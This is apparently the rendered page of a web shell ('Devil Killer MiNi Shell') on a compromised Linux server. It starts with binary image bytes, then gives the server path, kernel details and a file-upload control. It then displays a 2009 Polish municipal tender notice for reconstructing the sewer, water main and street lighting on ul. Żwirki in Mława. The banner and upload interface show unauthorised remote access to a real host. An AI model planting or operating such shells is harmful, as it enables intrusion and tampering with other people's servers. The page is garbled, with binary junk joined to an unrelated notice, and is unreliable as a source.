JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090304/45487-N-2009.html

<p class="kh_header"><b>Mława: Przebudowa kanalizacji sanitarnej, sieci wodociągowej oraz oświetlenia ul. Żwirki w Mławie</b><br>
<b>Numer ogłoszenia: 45487 - 2009; data zamieszczenia: 04.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Mławy , Stary Rynek 19, 06-500 Mława, woj. mazowieckie, tel. 023 6546441, faks 023 6543652.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mlawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa kanalizacji sanitarnej, sieci wodociągowej oraz oświetlenia ul. Żwirki w Mławie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa kanalizacji sanitarnej, sieci wodociągowej
i oświetlenia ul. Żwirki, w szczególności:

Kanalizacja sanitarna:
- roboty remontowe - cięcie piłą nawierzchni bitumicznych na głębokości 6-10cm - 2326,2m
- mechaniczna rozbiórka nawierzchni bitumicznej o gr. 10cm z wywozem materiału
z rozbiórki na odległość do 1km - 1744,65m2
- pełne umocnienie pionowych ścian wykopów liniowych o głębokości do 6,0m palami szalunkowymi (wypraskami) w gruntach suchych kategorii III - IV wraz z rozbiórką (szerokość do 1m) - 2651,868m2
- umocnienie ścian wykopów liniowych szerokości do 1m i głębokości do 3m w gruntach nawodnionych kategorii I-II grodziami wbijanymi pionowo wraz z wyciąganiem grodzic - rurociąg PVC i studnie inspekcyjne - 533,498 m2
- pełne umocnienie pionowych ścian wykopów liniowych o głębokości do 6m palami szalunkowymi (wypraskami) w gruntach suchych kategorii I-II wraz z rozbiórka (szerokość do 1m) - 933,76m2
- wykopy liniowe o głębokości do 5m o szerokości do 1,0-1,5m w gruncie kategorii I-II
w umocnieniu słupowo-liniowym - rurociąg PVC i studnie inspekcyjne - 4757,703m3
- ręczne wykopy wąskoprzestrzenne lub jamiste ze skarpami o szerokości dna do 1,5m
i głębokości do 1,5m ze złożeniem urobku na odkład (kategoria gruntu I-II) - dotyczy kolizji z uzbrojeniem podziemnym - 245,7m3
- zasypywanie wykopów podłużnych, punktowych, rowów, wykopów obiektowych spycharkami z zagęszczeniem mechanicznym ubijakami (grubość warstwy w stanie luźnym 35cm) kategoria gruntu I-II - 4870,165m3
- rozplantowanie spycharkami do 1m3 ziemi wydobytej z wykopów liniowych - 1m3
- rozplantowanie spycharkami za każdy następny 1m3 ziemi z wyk. liniow. - 132,238m3
- obsypka rurociągu kruszywem dowiezionym - 588,104m3
- podłoża pod kanały i obiekty z materiałów sypkich grubości 10cm - 192,37m3
- kształtki PVC kanalizacyjne jednokielichowe łączone na wcisk o śr. zewn. 315mm - 36szt.
- kształtki PVC kanalizacyjne jednokielichowe łączone na wcisk o śr. zewn. 200mm - 11szt.
- kształtki PVC kanalizacyjne jednokielichowe łączone na wcisk o śr. zewn. 160mm - 34szt.
- kanały z rur PVC łączonych na wcisk o śr. zewn. 315mm - 780,3m
- kanały z rur PVC łączonych na wcisk o śr. zewn. 200mm - 84,4m
- kanały z rur PVC łączonych na wcisk o śr. zewn. 160mm - 298,4m
- zabezpieczenie kabla w ziemi - 36 zabezpieczeń
- studzienki kanalizacyjne systemowe o śr. 600mm - zamknięcie rurą teleskopową (wysokość poniżej 2,0m) - 2szt.
- studzienki kanalizacyjne systemowe o śr. 600mm - zamknięcie rurą teleskopową (wysokość powyżej 2,0m) - 65szt.
- kształtki PVC kanalizacyjne jednokielichowe łączone na wcisk o śr. zewn. 200mm wkładka in situ- 37szt.
- studnie rewizyjne z kręgów betonowych o śr. 1000mm w gotowym wykopie - 1 studz.
- przejścia przez ścianę betonową o grubości do 15cm dla rur. o śr. 250-300mm - 4 przej.
- próba szczelności kanałów rurowych o śr. nom. 300mm - 1163,1m
- inspekcja telewizyjna kanału PVC DN 315 , długość 780,3mb - 1 szt.
- roboty pomiarowe przy liniowych robotach ziemnych - 1,163km
- wykopy liniowe o głębokości do 5m o szerokości do 1,0-1,5m w gruncie kategorii I-II
w umocnieniu słupowo-liniowym - 302,4m3

Sieć wodociągowa:
- roboty remontowe - cięcie piłą nawierzchni bitumicznych na głębokości 6-10cm - 420m
- mechaniczna rozbiórka nawierzchni bitumicznej o gr. 10cm z wywozem materiału
z rozbiórki na odległość do 1km - 315m2
- pełne umocnienie pionowych ścian wykopów liniowych o głębokości do 3m palami szalunkowymi (wypraskami) w gruntach suchych kategorii I -II wraz z rozbiórką (szerokość do 1m) - 100m2
- wykopy liniowe o głębokości do 5m o szerokości do 1,0-1,5m w gruncie kategorii I-II
w umocnieniu słupowo-liniowym - 302,4m3
- ręczne wykopy wąskoprzestrzenne lub jamiste ze skarpami o szerokości dna do 1,5m
i głębokości do 1,5m ze złożeniem urobku na odkład (kategoria gruntu I-II) - dotyczy kolizji z uzbrojeniem podziemnym - 48,6m3
- zasypywanie wykopów podłużnych, punktowych, rowów, wykopów obiektowych spycharkami z zagęszczeniem mechanicznym ubijakami (grubość warstwy w stanie luźnym 35cm) kategoria gruntu I-II - 351m3
- podłoża pod kanały i obiekty z materiałów sypkich grubości 10cm - 21m3
- sieci wodociągowe - montaż rurociągów z rur polietylenowych o śr. zewn. 225mm - 32,5m
- obsypka rurociągu kruszywem dowiezionym - 21,908m3
- sieci wodociągowe - montaż rurociągów z rur polietylenowych o śr. zewn. 180mm - 13,5m
- zasuwy typu E z obudową o śr. 200mm montowane na rurociągach PVC i PE - 6 kpl.
- montaż trójnika kołnierzowego Combi T PN 6 i 16 atm o śr. 80mm - 4 kpl.
- hydranty pożarowe podziemne o śr. 80mm - 4 kpl.
- układanie mieszanki betonowej ręczne w konstrukcjach - ławy fundamentowe, bloki oporowe (odgałęzienia) - 0,2m3
- stopy fundamentowe betonowe o objętości do 0,5m3 pod hydranty i zasuwy- 0,5m3
- zabezpieczenie kabla w ziemi - 25 zabezpieczeń
- obrukowanie skrzynek na zasuwy na podsypce z piasku lub pospółki z zalaniem szczelin zaprawą cementową - 3,6m2
- próba wodna szczelności sieci wodociągowych (próby 200m)- 4 próby
- oznakowanie trasy wodociągu na murze - 10 kpl.
- przyłącze wodociągowe z rur ciśnieniowych PE o śr. zewn. 40mm - 164m
- nawiertki na istniejących rurociągach żeliwnych o śr. nominalnej 200mm - 10kpl.
- przebicie otworów o powierzchni do 0,05m2 w elementach z betonu żwirowego o grubości do 40cm - 10szt.
- roboty pomiarowe przy liniowych robotach ziemnych - 1 kpl.

Oświetlenie uliczne:
- demontaż oprawy oświetlenia zewn., demontaż na trzpieniu słupa lub wysięgnika - 21kpl.
- demontaż wysięgnika zewn., demontaż wysięgnika mocowanego na słupie lub ścianie, ciężar do 30kg - 21szt.
- demontaż tabliczki bezpiecznikowej - 21szt.
- demontaż słupa oświetleniowego WZ - 21szt.
- montaż i stawianie słupów oświetleniowych, słup SAL-S - 22szt.
- montaż przewodów do opraw oświetleniowych, wciąganych w słupy, rury osłonowe
i wysięgniki, wysokość latarń do 12m, przewody YDYp 3x2,5mm2 - 23kpl.
- montaż przewodów do opraw oświetleniowych, wciąganych w słupy, rury osłonowe
i wysięgniki, wysokość latarń do 7m, przewody YDYp 3x2,5mm2 - 22kpl.
- podłączenie przewodów pod zaciski lub bolce, przewód pojedynczy do 2,5mm2 - 135szt.
- montaż opraw oświetlenia zewnętrznego OUSb-250W na wysięgniku - 23szt.
- montaż opraw oświetlenia zewnętrznego OUSb-70W na wysięgniku - 22szt.
- cięcie nawierzchni mechanicznie, z mas mineralno-asfaltowych, głębokość 5cm - 350m
- rozebranie nawierzchni i chodników, masy mineralno-bitum. grubości do 4cm, ręcznie - 350m2
- przewierty mechaniczne dla rur pod obiektami, rur do fi 150mm (pierwsza w wiązce) - 30m
- kopanie rowów dla kabli, ręcznie, grunt kategorii III - 172m3
- nasypanie warstwy piasku na dnie rowu kablowego, szerokość do 0,6m - 540m
- układanie kabli w rowach kablowych, ręcznie, kabel do 0,5kg/m, przykrycie folią - 600m
- mufy z tworzyw termokurczliwych przelotowe na kablach energetycznych wielożyłowych o izolacji i powłoce z tworzyw sztucznych w rowach kablowych, kabel o przekroju żył do 35mm2 - 14szt.
- obróbka na sucho kabli na napięcie do 1kV o izolacji i powłoce z tworzyw sztucznych, kabel 1-zyłowy, do 16mm2 - 42szt.
- podłączenie przewodów pod zaciski i bolce, przewód pojedyńczy do 50mm2 - 84szt.
- układanie uziomów w rowach kablowych - 540m
- zasypywanie rowów dla kabli, mechanicznie, grunt kategorii III-IV - 123m3
- badanie linii kablowej średniego napięcia, niskiego napięcia i sterowniczej, kabel n.n., 4-żyłowy - 21 odcinków

Szczegółowy zakres zamówienia określają załączone przedmiary i dokumentacja techniczna. Teren jezdni, chodników, dojazdów prywatnych i obszary zielone zniszczone podczas realizacji Wykonawca robót przywróci do stanu pierwotnego. Roboty budowlane realizowane będą w terenie zurbanizowanym, w związku z czym zakłada się zabezpieczenie odpowiednich przejść i przejazdów w ruchu pieszym i kołowym..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.31.31.10-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium w wysokości: 25 000,00 zł (słownie: dwadzieścia pięć tysięcy złotych).
2.	Wadium może być wniesione w następujących formach:
	- pieniądzu, na rachunek bankowy nr 40 8213 0008 2003 0400 9999 0005,
	- 	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym,
	- gwarancjach bankowych,
	- gwarancjach ubezpieczeniowych,
       -	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
3.	Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowych                  lub gwarancji ubezpieczeniowych należy złożyć w oryginale w siedzibie Zamawiającego pok. 19, a potwierdzoną kserokopię załączyć w ofercie.
4.	Wadium musi być wniesione najpóźniej do dnia 25 marca 2009 r., do godz. 1000.
5.  	Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które 
w oznaczonym terminie znajdzie się na koncie Zamawiającego, a kserokopia dowodu wpłaty będzie załączone do oferty.
6.	Jeżeli przed upływem terminu składania ofert Wykonawca wycofa się z przetargu, Zamawiający dokona zwrotu wadium w terminie 3-ch dni od daty pisemnego zawiadomienia o wycofaniu się.
7.	Wykonawca, który nie wniesie wadium na zasadach określonych w SIWZ zostanie wykluczony z postępowania.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu: O udzielenie zamówienia mogą ubiegać się oferenci, którzy spełnią następujące warunki: 1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców        w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich).
Warunek zostanie uznany za spełniony, jeżeli wykonawca przedstawi:
1)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 
6 miesięcy przed upływem terminu składania ofert,
2)	koncesji, zezwolenia lub licencji jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym, 
3)	złoży oświadczenie w trybie art.22 ust. 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych,
2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia (w przypadku wspólnego ubiegania się dwóch i więcej wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny oraz łączne doświadczenie i kwalifikacje).
Warunek zostanie uznany za spełniony, jeżeli wykonawca przedstawi: 
1)	wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakie posiada
(załącznik nr 5);
2)	wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć        w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (wskazane osoby winne wykazać się doświadczeniem w realizacji co najmniej jednego zamówienia o zbliżonym do Zamówienia zakresie i wartości) (załącznik nr 6).
3)	dokumenty stwierdzające, że osoby, które będą wykonywały zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;  
4)	wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty 
i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie - (załącznik nr 3),
3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia (w przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna       i finansowa, przy czym oświadczenie z art. 22 składa każdy z nich).
Warunek zostaje uznany za spełniony na podstawie: 
1)	oświadczenia złożonego w trybie art. 22 ust.1 pkt 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.
2)	aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające,        że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
3)	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega             z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, 
lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4)	polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
na kwotę nie mniejszą niż 500 000,00 zł
4. Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz.U. z 2007 r. Nr 223, poz. 1655 z późn. zm.).
Warunek zostanie spełniony, jeżeli wykonawca przedłoży:
1)	oświadczenia złożonego w trybie art. 22 ust.1 pkt 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. 
2)	informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art.24 ust.1 pkt 4-8 ustawy Prawo zamówień publicznych z datą nie wcześniej niż 
6 miesięcy przed upływem terminu składania ofert,
3)	informacja  z Krajowego  Rejestru  Karnego w zakresie określonym w art. 24 ust.1 pkt 9 ustawy Prawo zamówień  publicznych z datą nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
W przypadku wspólnego ubiegania się udzielenie zamówienia przez dwóch lub więcej wykonawców w ofercie muszą być złożone przedmiotowe dokumenty przez każdego z nich (załącznik nr 2a do SIWZ).
Ocena spełnienia warunków dokonana zostanie zgodnie z regułą spełnia - nie spełnia
w oparciu o informacje zawarte w załączonych do oferty załącznikach, oświadczeniach   i dokumentach..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Na potwierdzenie spełniania warunków udziału w postępowaniu określonych w rozdziale V niniejszej specyfikacji Wykonawcy muszą przedstawić następujące dokumenty: 
1)  oświadczenie z art. 22 ust.1 pkt 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych - załącznik nr 2 do SIWZ,
2) oświadczenie o nie podleganiu wykluczeniu z przedmiotowego postępowania 
na podstawie art. 24 ust. 1 w związku z art. 22 ust. 1 pkt 4 ustawy - wg wzoru określonego w załączniku Nr 2a do SIWZ.  
3) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, że wykonawca prowadzi działalność gospodarczą o profilu objętym niniejszym zamówieniem wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku,                       gdy składający ofertę są wspólnikami spółki cywilnej do oferty należy dołączyć kserokopię umowy spółki,
4)  aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
5) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych 
lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, 
lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej  niż 3 miesiące przed upływem terminu składania ofert,
7)  wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakie posiada (załącznik nr 5 do SIWZ);
8)  wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć   w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (wskazane osoby winne wykazać się doświadczeniem w realizacji co najmniej jednego zamówienia o zbliżonym do Zamówienia zakresie i wartości)  (załącznik nr 6 do SIWZ);
9)	wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem 
i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (załącznik nr 3 do SIWZ);
10)	aktualne potwierdzenie przynależności do Izby Inżynierów Budownictwa osób realizujących zamówienie (kierownik budowy, kierownicy robót branżowych);
11)	informację na temat podwykonawców (jeżeli dotyczy) (załącznik nr 7 do SIWZ)
12) wypełniony kosztorys ofertowy (załącznik nr 8 do SIWZ)
13)informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby             w zakresie określonym w art.24 ust.1 pkt 4-8 ustawy Prawo zamówień publicznych      z datą nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
14) informacja  z Krajowego  Rejestru  Karnego w zakresie określonym w art. 24 ust.1 pkt 9 ustawy Prawo zamówień  publicznych z datą nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
15)	 w przypadku, gdy wykonawcę reprezentuje pełnomocnik, do oferty musi być załączone pełnomocnictwo (oryginał), określające jego zakres i podpisane przez osoby uprawnione do reprezentacji wykonawcy,
16)polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 500 000,00 zł.
17)	parafowany projekt umowy (załącznik nr 4 do SIWZ)
2.	Dokumenty, o których mowa w rozdziale VI niniejszej specyfikacji, należy przedstawić w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez osobę/y uprawnioną/e do reprezentacji Wykonawcy.
3.	W przypadku konsorcjum Wykonawca zamieszcza w ofercie niezbędne dokumenty zgodnie z  wskazówkami zawartymi w rozdziale VII niniejszej specyfikacji.
4.	W przypadku konsorcjum do oferty musi być załączony dokument ustanawiający pełnomocnika konsorcjum do reprezentowania go w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i przy zawarciu umowy w sprawie zamówienia publicznego.
5.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów tj: aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS lub KRUS i aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 składa dokumenty potwierdzające, że:
1)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
2)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne 
i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
3)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
Zamiast aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust 1 pkt 4-8 Wykonawca składa zaświadczenie organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa wyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Uwaga:
1.	Zamawiający wzywa wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnienie warunków udziałów postępowaniu lub którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia
w wyznaczonym terminie, chyba że mimo ich uzupełnienia konieczne byłoby unieważnienie postępowania.
